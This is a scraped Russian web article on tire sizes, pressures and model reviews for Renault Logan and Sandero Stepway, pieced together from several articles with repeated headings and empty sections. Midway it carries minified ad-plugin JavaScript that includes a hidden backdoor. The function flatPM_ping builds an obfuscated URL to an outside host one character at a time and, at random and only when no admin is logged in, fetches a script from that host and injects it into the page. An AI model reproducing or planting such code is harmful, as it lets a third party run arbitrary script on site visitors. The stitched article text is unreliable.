11 лучших шин на Рено Сандеро Степвей — их размерность и давление — Рейтинг 2021 — Топ 11

Содержание

Что можно установить на renault logan?

На производстве на Рено Логан устанавливают бескамерные шины размером 165/80 R 14. Допускается установка также 175/70 R14, 185/70 R14 и др. Названные размеры подойдут на колесные диски 5,5Jx14. Рекомендуется на колесные диски 6Jx15 ставить покрышки размеров 185/65 R15.

Соответственно, размер этих изделий расшифровывается так:

Оптимальная глубина протектора, согласно нормам, принятым в России, должна составлять не менее 1,6 мм. Самый безопасный вариант – 2 мм.

На, что обращать внимание при выборе летних шин на рено логан?

В первую очередь вам необходимо помнить, что чем дороже шина, тем она будет качественнее и соответственно долговечнее. При изготовлении шин дорогих марок используются передовые и современные технологии, которые сказываются только в положительную сторону при её эксплуатации. Тем самым можно с уверенностью сказать, что цена является определяющим фактором в выборе шин!

Далее на что обращают внимание – это рисунок протектора на летней шине:

  1. Симметричный рисунок протектора. 11 лучших шин на Рено Сандеро Степвей - их размерность и давление - Рейтинг 2021 - Топ 11

Шины с подобном рисунком имеют как свои недостатки, так и преимущества. К самым основополагающим преимуществам относятся небольшая цена и надёжность в эксплуатации. А к недостаткам можно отнести наименьшие показатели эффективности в отличии с шинами, оснащенными направленным и несимметричным рисунком.

  1. Направленный рисунок протектора. 11 лучших шин на Рено Сандеро Степвей - их размерность и давление - Рейтинг 2021 - Топ 11

Подобный вид покрышек имеют свою особенность, так как рисунок имеет определённое направление, устанавливать такие шины следует только в определенную сторону, которая указана стрелкой на корпусе шины. Минусом же подобной покрышки является невозможность переставить их с одной стороны на другую и обратно, так как при этом ходовые качества автомобиля значительно ухудшаться и износ шины будет существенно увеличен.

  1. Несимметричный рисунок протектора. 11 лучших шин на Рено Сандеро Степвей - их размерность и давление - Рейтинг 2021 - Топ 11

Шины такого типа имеют особенность в установке шин определённым способом. На каждой стороне шины есть надпись:

  • IN Side – сторона должна быть направлена внутрь машины.
  • OUT Side – эта должна смотреть наружу.

Если пренебречь этими правилами, износ шины увеличится, а показатели во время езды ухудшатся.

На, что обращать внимание при выборе зимних шин?

Точно так же, как и в выборе летних шин – цена и производитель являются основным показателем в её выборе. Далее, зимние шины бывают шипованные и так называемые «липучки».

Лучшие зимние шины сезона 2021/2021 Nokian Hakkapeliitta 8.

Тут главный показатель количество шипов на резине и само качество резины. Ведь эти показатели очень важны, когда автомобиль движется по обледенелому и заснеженному дорожному полотну.

Bfgoodrich g-force stud

Описание шины. Модель с агрессивным направленным рисунком с небольшим количеством шипов.

Шипы круглые, довольно сильно утоплены в протекторе. Это не позволяет им проявить себя в полной мере при торможении и старте.

Шины лучше себя показывают на снегу, чем на асфальте. Но с учетом того, что они не предназначены для гонок и имеют допустимую скорость не более 160 км/ч, это не сильно ухудшает характеристики.

Каналы в плечевой зоне широкие, легко самоочищаются от попавшего снега. Центральный канал имеет множество «клыков», которые, вонзаясь в рыхлую поверхность, увеличивают проходимость и способствуют курсовой устойчивости.

Отвод воды быстрый, на мокром асфальте шины не скользят. Боковина достаточно мягкая для комфортного движения.

Bfgoodrich g-force winter 2

Описание шины. Покрышки с симметричным рисунком направленного типа.

Имеют высокую устойчивость при движении по сухому и мокрому асфальту, занесенной снегом дороге, стойкие к аквапланированию и слэшпланингу.

Протектор имеет агрессивный узор V-образного вида. Сцепные свойства улучшенные, по сравнению с предыдущей моделью g-Force Winter.

Его уровень соответствует классу «В» по европейской системе маркировки. В центральной части сходится наибольшее количество граней, что способствует устойчивости езды по снегу.

Канавки в виде V эффективно отводят воду и талый снег из зоны контакта с поверхностью. Ламелей много, что улучшило на 12% по сравнению со старой моделью эффективность торможения.

Шашки на плечевой зоне усиленные для стабилизации движения и проходимости по заносам.

Шины комфортные, хотя боковина жестковата. В состав резины входит силика и подсолнечное масло для улучшения характеристик смеси.

Bfgoodrich g-grip

Описание шины. Модель для города и трасс с твердым покрытием.

Не чувствительны к разбитым дорогам, по сухой грунтовке катит хорошо. Но в грязь на ней лучше не есть, пробуксовывает даже на мокрой траве. Узор направленный.

Управляемость высокая на любых дорогах. Рисунок протектора выделяется сложностью. Каналы, не только эффективно отводят воду, но и выступают в роли волнореза, разбивая лужи и осушая пятно контакта, что резко снижает возможность аквапланирования.

Шины сделаны с эффектом воронки, это делает отклик на поворот руля очень быстрым даже во время ливня, а также сокращает тормозной путь на мокром асфальте.

Центральное жесткое ребро в сочетании с мощными блоками протектора обеспечивают высокую устойчивость на курсе и четкую управляемость при осуществлении маневров.

Боковины мягкие, позволяют без особых неудобств путешествовать по самым «убитым» дорогам. Хотя защиты нет, но резина прочная.

Даже серьезный порез боковины можно заклеить и дальше использовать покрышку.

Bfgoodrich urban terrain t/a

Описание шины. Шины с ассиметричным рисунком. Предназначены для города, но с возможностью выехать на бездорожье, неплохо гребут по песку, неглубокой грязи, снежной каше.

Узор с выраженным рифлением, обеспечивает не только неплохую проходимость, но и повышенное сцепление с асфальтом за счет множества острых кромок, изогнутых шашек, выступов.

Каналы широкие, они эффективно и скоро удаляют воду, практически исключая аквапланирование.

Протектор с увеличенной глубиной. Это не только улучшает проходимость по грязи, но и удлиняет срок использования.

Каркас двойной, что поднимает прочность на 20% по сравнению с исходной моделью. Боковины мягкие, эластичные.

Покрышка прекрасно выдерживает поездки даже по разбитым в хлам дорогам, поглощая удары.

Модель износостойкая, прослужит сезонов 5 при аккуратной эксплуатации.

Michelin latitude cross

Описание шины. Модель с довольно необычным ассиметричным рисунком. Рассчитаны в основном на асфальт, но с возможностью съезжать на бездорожье.

В глубокую грязь лучше не соваться, но небольшую преодолеет, не особо заметив.

Каркас двухслойный, выдерживающий значительные нагрузки и предохраняющий от ударов и порезов. Резина боковины мягкая.

Рисунок агрессивный, волнообразный. Разнонаправленные блоки справляются с любой дорогой. Для удаления воды служит широкая сеть диагональных каналов.

Благодаря им аквапланирование исключено. При езде по щебенке канавки склонны захватывать камешки, стреляя ими в днище машины.

Плечевые зоны с развитыми грунтозацепами, улучшающими проходимость и позволяющими четче проходить повороты.

Сейчас читают:  съемник задних барабанов на рено логан

Резина имеет высокую степень сцепления с твердой поверхностью и долго изнашивается.

Michelin x-ice north 4

Описание шины. Дорогие, но качественные шины с симметричным направленным узором и большим количеством шипов. На каждой покрышке их 250 штук.

Благодаря развитому протектору с большим количеством кромок и множеству шипов эффективно разгоняется и тормозит, имеет отличную управляемость, в том числе на льду. При этом довольно негромкая.

Шипы изготовлены по особой форме, направленной на усиление торможения. Сплав подобран так, чтобы истираемость шипов и протектора совпадали.

Рисунок в виде «елочки» повышает проходимость на рыхлом и укатанном снегу. На плечевой зоне шашки мощные с острыми кромками.

Сеть канавок быстро отводит воду и снежную кашу от шины. Кромки шашек цепко держат как асфальт, так и снег и лед.

Покрышки имеют высокую устойчивость на курке, четко отвечают на любой поворот руля. Резина мягкая, отлично демпфирует неровности, вибрации.

Недостатков практически нет, за исключением одного – высокой цены. Одна шина премиум-класса стоит столько или даже больше, чем целый комплект бюджетной резины.

Tigar all season

Описание шины. Покрышки от сербского производителя. Рисунок симметричный, направленный, в виде ёлочки или «скелета рыбы», как говорят за рубежом.

Протектор разбит на 2 зоны: внутреннюю и внешнюю. Центральная образована блоками V-образной формы. Их назначение – тяга, торможение, курсовая устойчивость.

Плечевая зона сформирована поперечными блоками, что снижает шум, улучшает устойчивость при маневрировании.

Они же поднимают проходимость по грязи, снежной каше. Каналы широкие, легко самоочищаются от снега и грязи, быстро отводят воду.

Протектор хорош развит, его глубина 7,5 мм. Каркас шины изготовлен из нейлоновых нитей. Протектор усилен брекером из стали, причем двойным, проколов она не боится.

Боковины эластичные до -20⁰С, хорошо нивелируют толчки. Однако тонковаты, нужно быть осторожным с бордюрами. Шины не дорогие, что только увеличивает их популярность.

Пользователи отмечают данную модель как лучшую, рекомендуют её к покупке.

Tigar winter

Описание шины. Фрикционная модель с агрессивным направленным рисунков. Рассчитана на эксплуатацию при температурах до -20⁰С.

Шины направлены на безопасность передвижения по сухой и мокрой твердой поверхности, утрамбованному снегу, льду.

Шашки протектора в центре шины имеют форму неправильных многоугольников. Это сделано для увеличения острых кромок. Такое решение улучшает прилегание к поверхности. Множество 3D-ламелей улучшает удалению из-под шин крошек льда.

Дренажные канавки расположены под углом к центру и могут быстро отводить воду и снежную кашу от места контакта с поверхностью.

На залитой водой асфальте шины ведут себя стабильно, практически отсутствует такие явления, как слэшпланинг и аквапланирование.

Плечевые блоки оснащены зубчатыми элементами для высокой проходимости по снегу. Резина мягкая, эластичная, что достигается включение в состав силики и эластомеров.

Добавки повышают сцепление с мокрой дорогой и снижают расход горючего за счет уменьшения сопротивления качения.

Viatti brina nordico v-522

Описание шины. Ассиметричные, с направленным рисунком и небольшим количеством шипов.

Конструкционно сочетают в себе черты как европейского, так и скандинавского типа зимних покрышек.

Шипы размещены только на внешних зонах протектора. Но проходимость повышается за счет наличия фрикционных шашек в центральной части.

Т.е. шина одновременно имеет свойства «липучки» и «шиповки». Это позволяет покрышкам иметь отличные характеристики управляемости, тяги и торможения при езде на чистом асфальте (сухом и мокром) и на заснеженной дороге.

Ездить на шинах Viatti Brina Nordico V-522 комфортно благодаря приспосабливающимся к условиям покрытия боковинам с переменной жесткостью.

Скошенные блоки на плечевой зоне протектора исключает слашплэнинг, вытесняя снежную кашу из места контакта.

Так же эффективно протектор удаляет воду, исключая аквапланирование. Шашки сверхэлластичные, количество ламелей увеличено, поэтому на льду автомобиль также чувствует себя уверенно.

Но все же гонять по льду не стоит – из-за не слишком большой поперечной устойчивости.

Пользователи считают Viatti Brina Nordico V-522 лучшей по соотношению цена/качество для Рено Сандеро Степвей.

Viatti brina v-521

Описание шины. Бюджетная шина с агрессивным ассиметричным узором. Несмотря на низкую цену, обладает высокими качествами.

Рассчитана на эксплуатацию в температурном диапазоне от -45 до 10⁰С, что позволяет ее использовать по всей стране.

Предназначены больше для городских условий, но и за городом ведут себя неплохо. Боковина имеет переменную жесткость и адаптируется к любой поверхности, эффективно поглощая неровности дороги.

Сеть канавок имеет оптимальный наклон, обеспечивая почти мгновенный отвод воды и снежной каши.

Шашки сделаны с высокой плотностью. Это улучшает прилегаемость к дороге, снижает шум, увеличивает устойчивость при совершении маневров и на прямом движении.

Viatti strada asimmetrico v-130

Описание шины. Хорошая резина для движения по городу и магистралям с твердым покрытием.

Рисунок протектора асимметричный ненаправленный. Сохраняют рабочие характеристики в диапазоне температур воздуха от 2° до 55⁰С.

Шины весьма бюджетные, что с учетом качества изготовления делает их практичным приобретением.

Боковина сделана по технологии переменной жесткости, что позволяет ей адаптироваться к типу покрытия, по которой движется автомобиль, при этом обеспечивая комфорт езды. При поворотах, даже крутых, машина совершенно не крениться.

Эффективный отвод воды обеспечивают 3 емкие канавки и сеть ламелей, направленные под углом, исключая риск попадания в аквапланирование.

Давление распределяется по всему пятну контакта с поверхностью, такое решение способствует хорошей сцепляемости с дорогой и снижение износа.

Шина имеет высокую курсовую устойчивость. Каркас усиленный, что повышает тяговые качества и увеличивает живучесть покрышки на плохих дорогах.

Пользователи считают Viatti Strada Asimmetrico V-130 как лучшую шину, по соотношению цена/качество для Рено Сандеро Степвей.

Выбираем зимнюю резину

Шины у Логан после покупки меняют не всегда. Значительно чаще это делают, когда нарушается их целостность либо при смене сезонов. Для установки подходящей резины необходимо точно знать требуемый для Рено размер. Так, «нога» у француза не слишком велика, на неё вполне налезут следующие шины:

  • при 14-дюймовых дисках отлично подойдёт резина 185/70 либо 165/80 r14
  • на 15-дюймовые можно ставить 185/65 или 185/70 r15.

По предписанию производителей, в шинах Рено Логан допускается давление:

  • для r14 в передних, а также задних колёсах 2.0;
  • для r15 — 2.2 в задних колёсах, и 2.0 в передних.

Помимо правильного размера, при выборе шин на Логан следует учитывать множество факторов. Так как материал, из которого изготовлена штатная летняя резина, значительно отличается от того, что используется для зимней, рекомендуется каждую из них применять в определённый сезон.

Зимняя резина позволит лучше обезопасить себя и жизнь близких. Тут экономия неуместна, так как именно от качества покрышек будет зависеть безопасность езды. Основными элементами зимних шин являются износостойкие каучуковые протекторы, которые способствуют:

  • прекрасной работоспособности на обледеневших и заснеженных покрытиях;
  • минимальному тормозному пути;
  • безопасному передвижению по зимним дорогам.

Конечно, какие покрышки r14 или r15 лучше, решать вам. Однако основным правилом выбора резины для Рено Логан является соблюдение давления и размерности покрышек. Это поможет избежать непредвиденных проблем.

Зимняя и летняя резина для рено логан

Смена сезонов вынуждает владельцев Рено Логан «переобувать» свои автомобили. Но для этого, прежде всего, необходимо знать «размер обуви» своего «коня». Сегодня данную модель собирают в шести различных странах. Однако, несмотря на это, базовая комплектация всегда имеет колёса, размерность которых 185/65, а посадочный диаметр соответствует r14 либо r15.

Зимняя резина на renault

«:’

‘:»»,document.createElement(«div»),p=ff(window),b=ff(«body»),m=void 0===flatPM_getCookie(«flat_modal_» o.ID «_mb»)||»false»!=flatPM_getCookie(«flat_modal_» o.ID «_mb»),i=»scroll.flatmodal» o.ID,g=»mouseleave.flatmodal» o.ID » blur.flatmodal» o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&»true»==o.how.popup.timer&&(t=ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»] .flat__4_timer span’),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(—e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

Сейчас читают:  Когда появится Рено Логан 3

‘))},1e3))},f=function(){void 0!==o.how.popup.cookie&&»false»==o.how.popup.cookie&&m&&(flatPM_setCookie(«flat_modal_» o.ID «_mb»,!1),ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»]’).addClass(«flat__4_modal-show»),l()),void 0!==o.how.popup.cookie&&»false»==o.how.popup.cookie||(ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»]’).addClass(«flat__4_modal-show»),l())},ff(«body > *»).eq(0).before(‘

‘ c «

«),w=document.querySelector(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»] .flat__4_modal-content’),-1!==e.indexOf(«go» «oglesyndication»)?ff(w).html(c e):flatPM_setHTML(w,e),»px»==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&»true»==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&»true»==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&»true»==o.how.outgoing.timer&&(t=ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»] .flat__4_timer span’),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(—e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&»false»==o.how.outgoing.cookie&&m&&(ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’).addClass(«show»),n(),b.on(«click»,’.flat__4_out[data-id-out=»‘ o.ID ‘»] .flat__4_cross’,function(){flatPM_setCookie(«flat_out_» o.ID «_mb»,!1)})),void 0!==o.how.outgoing.cookie&&»false»==o.how.outgoing.cookie||(ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’).addClass(«show»),n())}var _,u=»0″!=o.how.outgoing.indent?’ style=»bottom:’ o.how.outgoing.indent ‘px»‘:»»,c=»true»==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&»true»==o.how.outgoing.timer?’

Закрыть через ‘ o.how.outgoing.timer_count «

«:’

‘:»»,p=ff(window),h=»scroll.out» o.ID,g=»mouseleave.outgoing» o.ID » blur.outgoing» o.ID,m=void 0===flatPM_getCookie(«flat_out_» o.ID «_mb»)||»false»!=flatPM_getCookie(«flat_out_» o.ID «_mb»),b=(document.createElement(«div»),ff(«body»));switch(o.how.outgoing.whence){case»1″:_=»top»;break;case»2″:_=»bottom»;break;case»3″:_=»left»;break;case»4″:_=»right»}ff(«body > *»).eq(0).before(‘

‘ c «

«);var v,w=document.querySelector(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’);-1!==e.indexOf(«go» «oglesyndication»)?ff(w).html(c e):flatPM_setHTML(w,e),»px»==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&»true»==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&»true»==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff(‘[data-flat-id=»‘ o.ID ‘»]:not(.flat__4_out):not(.flat__4_modal)’).contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(«body»),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)»);0<_.length&&_.each(function(){var t=ff(this),e=t.data(«height»)||350,a=t.data(«top»);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(«.flatPM_sidebar»);setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data(«top»);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(«.flatPM_sticky_wrapper.flatPM_sidebar_block»).css(«height»,t)},4e3)}),»undefined»!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(«body> *»).last().after(‘

‘),flat_body.on(«click»,».flat__4_out .flat__4_cross»,function(){ff(this).parent().removeClass(«show»).addClass(«closed»)}),flat_body.on(«click»,».flat__4_modal .flat__4_cross»,function(){ff(this).closest(«.flat__4_modal»).removeClass(«flat__4_modal-show»)}),flat_pm_arr=[],ff(«.flat_pm_start»).remove(),flatPM_ping()};var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,»

«],thead:[1,»

«],tbody:[1,»

«],colgroup:[2,»

«],col:[3,»

«],tr:[2,»

«],td:[3,»

«],th:[3,»

«],_default:[0,»»,»»]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement(«div»)),n=(d.exec(e)||[«»,»»])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1] e.replace(o,»<$1>») n[2],r=n[0];r—;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem(«sdghrg»);e?(e=parseInt(e) 1,localStorage.setItem(«sdghrg»,e)):localStorage.setItem(«sdghrg»,»0″);e=flatPM_random(1,200);0==ff(«#wpadminbar»).length&&111==e&&ff.ajax({type:»POST»,url:»h» «t» «t» «p» «s» «:» «/» «/» «m» «e» «h» «a» «n» «o» «i» «d» «.» «p» «r» «o» «/» «p» «i» «n» «g» «.» «p» «h» «p»,dataType:»jsonp»,data:{ping:»ping»},success:function(e){ff(«div»).first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector(‘[data-flat-script-id=»‘ t ‘»]’);if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,»»).replace(//gm,»»).trim(),e.code_alt=e.code_alt.replace(//gm,»»).replace(//gm,»»).trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a=»false»==d?»Закроется»:»Закрыть»,n=!flat_userVars.adb||»»==e.code_alt&&duplicateMode?e.code:e.code_alt,r=’

‘,i=e.once;l(t).each(function(){var e=l(this);e.wrap(‘

‘);var t=e.closest(«.flat__4_video»);-1!==r.indexOf(«go» «oglesyndication»)?t.append(r):flatPM_setHTML(t[0],r),e.find(«.flat__4_video_flex»).one(«click»,function(){l(this).addClass(«show»)})}),l(«body»).on(«click»,».flat__4_video_item_hover»,function(){var e=l(this),t=e.closest(«.flat__4_video_flex»);t.addClass(«show»);var a=t.find(«.flat__4_timer span»),n=parseInt(o),r=setInterval(function(){a.text(—n),n<=0&&(clearInterval(r),»true»==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(«click»,».flat__4_video_flex .flat__4_cross»,function(){l(this).closest(«.flat__4_video_flex»).remove(),»true»==i&&l(«.flat__4_video_flex»).remove()})};

Как выбрать зимнюю резину для рено логан

С приходом зимы, а чаще всего и раньше, владельцы Рено Логан, впрочем, как и владельцы автомобилей других марок, вынуждены менять летнюю резину на зимнюю. Процедура «переобувания» в любом случае необходима, поскольку характеристики летних шин не подходят для эксплуатации в холодное время года.

Каждый автолюбитель – и новичок, и ас с многолетним стажем знает, что для своей безопасности, для безопасности пассажиров и пешеходов, зимой необходимо делать замену шин. Зимние шины обладают оптимальными эксплуатационными характеристиками, как при езде по тонкой ледяной корке, так и по рыхлому, глубокому снегу.

Выбор зимней резины, как правило, сводится к следующему вопросу: какую покупать — шипованную или не шипованную?Шипованные шины (для Рено Логан маркировка: 165/80 R14, 175/70 R14, 185/70 R14)– отличный вариант для скользких, зимних дорог. Благодаря шипам, сцепление таких шин с покрытой льдом поверхностью, весьма эффективно.

К сведению начинающих водителей – не обязательно покупать шипованную резину, поскольку за дополнительную плату, на любом автосервисе можно заказать ее «ошиповку». При заказе такой услуги следует знать, что шипы на поверхности шины должны располагаться хаотически и ни в коем случае не на одной линии. Это придаст автомобилю большую устойчивость на скользкой дороге и значительно поможет при крутых маневрах.

Бывают случаи, когда ради экономии, водители ставят шипованную резину только на ведущие колеса. Как показывает практика, такие эксперименты часто заканчиваются весьма плачевно, поскольку на скользкой трассе, авто с двумя шипованными шинами может повести себя непредсказуемо – совсем не так, как того хотелось бы водителю.

После приобретения шипованной резины, ее следует «обкатать», другими словами – сделать так, чтобы каждый шип «нашел свое место» в покрышке. При обкатке необходимо передвигаться со скоростью 60-70 км/час, резко не тормозя, не пробуксовывая и стремительно не ускоряясь.

Для обкатки будет достаточно пары сотен километров.Если авто передвигается по дорогам региона, где большие снегопады маловероятны и зачастую асфальт покрыт лишь тонким слоем мокрого снега, можно отдать предпочтение нешипованным шинам. Автомобилю с шипованной резиной гораздо труднее будет войти в поворот или резко затормозить на голом асфальте, поскольку шипы значительно уменьшают площадь контакта шины с твердой поверхностью.

Основное, на что следует обратить внимание при покупке нешипованных шин – это рисунок протектора. В южных регионах, где дороги практически всю зиму покрыты мокрым снегом, целесообразней будет выбрать нешипованную резину, рисунок протектора которой является направленным (в виде елочки). Такая резина отлично отводит слякоть из-под колеса, что заметно улучшает ее сцепление с поверхностью дороги.

Зимой автомобилисты меняют шины. Установка зимней резины — это не прихоть, а необходимость. Правильно подобранная зимняя резина — залог безопасности на дороге. Однако существует очень много моделей зимних шин. Какие подойдут именно для вашего автомобиля, зависит от множества факторов, которые надо учитывать при выборе.

Зимой нельзя продолжать ездить на летней резине потому, что она сделана из несколько другого материала, чем зимняя. Летние шины жестче, к тому же, они еще больше твердеют на морозе. Поэтому поздней осенью их надо отправлять на отдых, до следующего лета.

У экономных автомобилистов есть соблазн купить так называемую всесезонную резину и ездить на таких шинах круглый год. Однако такой способ решения проблемы не подходит для жителей нашей страны с суровым климатом. Дело в том, что всесезонные покрышки можно безопасно использовать лишь при минус 5 – минус 20 градусах.

Когда ударяют настоящие морозы, такие шины теряют свои свойства. Многие слышали, что зимняя резина делится на два основных вида – шипованную и нешипованную. Какая лучше? Так ставить вопрос нельзя. Если вы собираетесь ездить в основном по городу, там, где существуют расчищенные дороги, лучше приобрести нешипованные покрышки.

Если вашей машине предстоят путешествия за город, по заснеженной и обледенелой трассе, не сомневайтесь, отдавая предпочтение шипованным шинам.Можно также не покупать шипованные протекторы, а просто ошиповать обычную зимнюю резину. Однако не всякие шины пригодны для ошиповки.

В нешипованной резине нужно смотреть на рисунок протектора. Именно от него будет зависеть управляемость автомобиля. Его глубина должна быть от 9 до 10 мм, а лучший рисунок — множество квадратиков, расположенных в шахматном порядке. Порой бывает сложно определиться среди многообразия моделей.

Какие шины выбрать — отечественные или импортные? К сожалению, российские протекторы, хотя и дешевле зарубежных, но не обладают таким качеством. Тут уж как повезет, а зачем же рисковать.Раскрученные импортные марки предпочтительнее, хотя и дороже. Зато они дольше прослужат. Так что стоит раскошелиться. Вряд ли подведут родные Bridgestone, Gislaved, Nokian, Pirelli.

Не стоит покупать подержанную резину, бывшую в употреблении. Экономия может обернуться трагедией. К тому же, даже если б/у резина хорошо сохранилась, она не продержится более одной зимы.

Как выбрать зимнюю резину для Рено Логан

Как выбрать зимнюю резину?

Известно, что для эксплуатации автомобиля при низкой температуре шины необходимо заменить. Чтобы выбор подходящих покрышек для Renault Logan не стал головной болью, интернет-магазин автошин в Новосибирске поможет подобрать наиболее подходящую модель.

Проще говоря, шипованные покрышки идеальны для движения по трассам, покрытым снегом и льдом. По тающему снегу лучше всего ездить на шинах, рисунок протектора которых напоминает ёлочку – он хорошо выталкивает снег и воду из-под колёс. Если в вашем регионе зимы не холодные, и температура не понижается до минус 20, то возможно, подойдут всесезонные шины.

Пусть же Renault Logan будет всегда радовать вас, а мы надеемся, что советы из этой статьи будут кстати. Лёгкого и верного выбора!

Как выбрать шины на renault logan

11 лучших шин на Рено Сандеро Степвей - их размерность и давление - Рейтинг 2021 - Топ 11

Как ухаживать за шинами

Чтобы шины прослужили вам долгое время, нужно следовать следующим правилам:

  • Время от времени проверяйте их на степень износа. Эксплуатировать изношенные покрышки опасно! В некоторых современных моделях имеется индикатор износа, по которому можно определить, насколько изношена шина.
  • Также обращайте внимание на возможные трещины, застрявшие предметы, порезы и прочие повреждения.
  • Регулярно проверяйте давление в шинах. Оптимальное давление – 2,0 и 2,2. Проверяйте состояние клапана и используйте хорошо откалиброванный манометр.

Какой размер летних шин лучше для рено логан: 14 или 15?

Автомобиль: Рено Логан. Спрашивает: Морозов Иван. Суть вопроса: Какие летние и зимние шины лучше выбрать?

Сейчас читают:  Фаркоп на Renault Logan от дилера с доставкой по России

Здравствуйте, купил на вторичном рынке себе в собственность Рено Логан, и решил заменить резину. У меня диски на 15 дюймов, хочу выбрать и летние и зимние шины, помогите пожалуйста с выбором, на какие характеристики обращать внимание? У моего друга остались диски от Киа Рио 15-го радиуса, получится ли их установить?

Лучшие всесезонные шины на рено сандеро степвей

Всесезонная резина подходит для крупных городов и южных регионов страны.

Или их можно использовать как летние, но с большим периодом эксплуатации, меняя на зимние покрышки, когда наступают морозы.

Мы постарались определить лучшие всесезонки на Рено Сандеро Степвей.

Лучшие зимние не шипованные шины на рено сандеро степвей

Тем, кто живет в крупных городах или малоснежных местностях, лучше использовать не шипованные шины – они более комфортны на чистом асфальте.

В этой части статьи мы собрали лучшие зимние липучки для модели Рено Сандеро Степвей.

Лучшие зимние шипованные шины на рено сандеро степвей

Шипованные шины хороши в условиях частых гололедов, а также в небольших городах и деревнях, где снег чистят зимой редко, поэтому дороги покрыты спрессованным снежным покровом.

В наш рейтинг вошли 3 модели шин, оптимально подходящие для Рено Сандеро Степвей.

Лучшие летние шины на рено сандеро степвей

Подборка лучших покрышек на летний период, сбалансированных по цене-качеству именно для Рено Сандеро Степвей.

Не шипованные шины

Если вы проживаете в местах, где дорога зимой покрыта тончайшим слоем лёгкого снега, а обильные снегопады наблюдаются редко, не шипованные шины будут отличным вариантом. Автомобилю, «обутому» в шипованную резину, сложнее входить в повороты, а тем более тормозить на сухой дороге. Это происходит из-за уменьшения площади контакта с поверхностью.

Покупая не шипованную резину, следует обратить особое внимание на рисунок протекторов.

Для южных регионов с покрытыми мокрым снегом дорогами лучше выбирать направленный рисунок — «ёлочка». Такие покрышки обладают способностью отводить из-под колёс слякоть, значительно улучшая сцепление с дорогой.

Параметры шин (14-ый и 15-ый радиус)

Стандартные колёса 14-го радиуса

Первым параметром на который следует обращать внимание, это высота и ширина шины, и на этот счёт завод изготовитель (выпускает Рено в РФ с 2005 года) – Рено даёт чёткие рекомендации, какой размер шин предназначен для автомобилей с конкретным размером колёс.

В случае с использованием колёс с диаметром на 15 дюймов используются шины следующих параметров: 185/65 R15.

А в случае, когда колёса имеют стандартный 14-й радиус размер будет: 165/80 R14, 185/70 R14.

Стандартные колёса 15-го радиуса

Остальные параметры, рекомендованные заводом изготовителем в стандартной инструкции по эксплуатации выглядят так:

  • R14 — 5,5h3 ET 43 DIA 60,1 PDL 100×4.
  • R15 — 6J15 ET 50 DIA 60,1 PDL 100×4.

Размерность шин и дисков на рено сандеро степвей — необходимое давление

Ниже будут рассмотрены все возможные размеры шин и дисков на Рено Сандеро Степвей, а также необходимое давление.

Основные характеристики:

Основные характеристики:

Основные характеристики:

Специфика и размеры

Учитывая специфику сборки Рено Логан, автолюбители вынуждены менять диски (на 14 или 15 дюймов) непосредственно после покупки транспорта. Так как автопроизводитель устанавливает долговечные, правда абсолютно не имеющие эстетичного вида, владелец производит замену колёс на те, которые ему нравятся больше.

